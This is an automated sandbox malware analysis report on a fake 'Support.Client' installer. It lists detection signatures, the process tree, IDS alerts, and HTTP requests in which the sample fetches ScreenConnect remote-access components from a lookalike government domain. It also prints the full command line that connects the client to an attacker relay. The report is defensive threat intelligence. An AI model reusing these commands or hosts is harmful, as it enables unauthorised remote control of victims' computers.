Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Support.Client (1).exe

Overview

General Information

Sample name:Support.Client (1).exe
Analysis ID:1555317
MD5:ee2fd372b98d7899c7e12d85f4c7f695
SHA1:22f704d299c0160038965ad41d6a486e5c125f55
SHA256:021ecc419445fe19ca6a15e7367c88f8a4121023746acd94263fb3e156861e03
Infos:

Detection

ScreenConnect Tool
Score:54
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:33
Range:0 - 100

Signatures

.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Detected potential unwanted application
Enables network access during safeboot for specific services
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • Support.Client (1).exe (PID: 6872 cmdline: "C:\Users\user\Desktop\Support.Client (1).exe" MD5: EE2FD372B98D7899C7E12D85F4C7F695)
    • dfsvc.exe (PID: 6996 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 7480 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
        • ScreenConnect.ClientService.exe (PID: 7516 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1" MD5: 75B21D04C69128A7230A0998086B61AA)
    • WerFault.exe (PID: 5820 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6872 -s 748 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7144 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 1436 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 6872 -ip 6872 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 1220 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ScreenConnect.ClientService.exe (PID: 7544 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1" MD5: 75B21D04C69128A7230A0998086B61AA)
    • ScreenConnect.WindowsClient.exe (PID: 7620 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe" "RunRole" "e04200b7-51c0-4bc4-8341-7c372a508bae" "User" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
    • ScreenConnect.WindowsClient.exe (PID: 7740 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe" "RunRole" "f3bbb14b-5a68-497e-a4df-886e478b3d62" "System" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      SourceRuleDescriptionAuthorStrings
      00000009.00000000.1948916428.00000000000F2000.00000002.00000001.01000000.0000000B.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        00000001.00000002.2526431199.000002CADA736000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          00000009.00000002.1968054123.000000000246F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            Process Memory Space: dfsvc.exe PID: 6996JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7480JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                Click to see the 1 entries
                SourceRuleDescriptionAuthorStrings
                9.0.ScreenConnect.WindowsClient.exe.f0000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

                  System Summary

                  barindex
                  Source: Network ConnectionAuthor: Nasreddine Bencherchali (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49731, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 6996, Protocol: tcp, SourceIp: 185.49.126.73, SourceIsIpv6: false, SourcePort: 443
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 7144, ProcessName: svchost.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-13T18:18:14.618715+010020229301A Network Trojan was detected20.109.210.53443192.168.2.449758TCP
                  2024-11-13T18:18:52.068139+010020229301A Network Trojan was detected20.109.210.53443192.168.2.449767TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-13T18:18:08.450586+010020098971A Network Trojan was detected185.49.126.73443192.168.2.449749TCP
                  2024-11-13T18:18:09.799995+010020098971A Network Trojan was detected185.49.126.73443192.168.2.449750TCP
                  2024-11-13T18:18:14.695907+010020098971A Network Trojan was detected185.49.126.73443192.168.2.449757TCP
                  2024-11-13T18:18:16.078938+010020098971A Network Trojan was detected185.49.126.73443192.168.2.449760TCP
                  2024-11-13T18:18:18.971122+010020098971A Network Trojan was detected185.49.126.73443192.168.2.449761TCP
                  2024-11-13T18:18:20.743010+010020098971A Network Trojan was detected185.49.126.73443192.168.2.449762TCP
                  2024-11-13T18:18:22.288207+010020098971A Network Trojan was detected185.49.126.73443192.168.2.449763TCP
                  2024-11-13T18:18:23.625915+010020098971A Network Trojan was detected185.49.126.73443192.168.2.449764TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.9% probability
                  Source: C:\Users\user\Desktop\Support.Client (1).exeCode function: 0_2_00611000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00611000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.ClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\ScreenConnect.WindowsClient.exeJump to behavior

                  Compliance

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.ClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: Support.Client (1).exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: Support.Client (1).exeStatic PE information: certificate valid
                  Source: unknownHTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49735 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49749 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49750 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49752 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49754 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49755 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49757 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49760 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49761 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49762 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49763 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49764 version: TLS 1.2
                  Source: Support.Client (1).exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: Support.Client (1).exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA938000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA5C2000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADAB2C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.1964904013.0000000000D02000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.2932709226.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2024038339.0000000000BC0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2024331738.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000000.1953021568.0000000000D7D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA9F7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA944000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA5CE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1970874723.000000001B382000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA9F7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA944000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA5CE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1970874723.000000001B382000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1948916428.00000000000F2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA5C6000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADAADB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA93C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1969141037.000000001AC22000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1948916428.00000000000F2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA5C6000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADAADB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA93C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1969141037.000000001AC22000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA5BE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.1965505109.0000000004BA2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\Jump to behavior

                  Networking

                  barindex
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeRegistry value created: NULL Service
                  Source: global trafficTCP traffic: 192.168.2.4:49766 -> 185.49.126.73:8041
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzipConnection: Keep-Alive
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 185.49.126.73:443 -> 192.168.2.4:49749
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 185.49.126.73:443 -> 192.168.2.4:49750
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49758
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 185.49.126.73:443 -> 192.168.2.4:49757
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 185.49.126.73:443 -> 192.168.2.4:49760
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 185.49.126.73:443 -> 192.168.2.4:49761
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 185.49.126.73:443 -> 192.168.2.4:49763
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 185.49.126.73:443 -> 192.168.2.4:49762
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 185.49.126.73:443 -> 192.168.2.4:49764
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49767
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
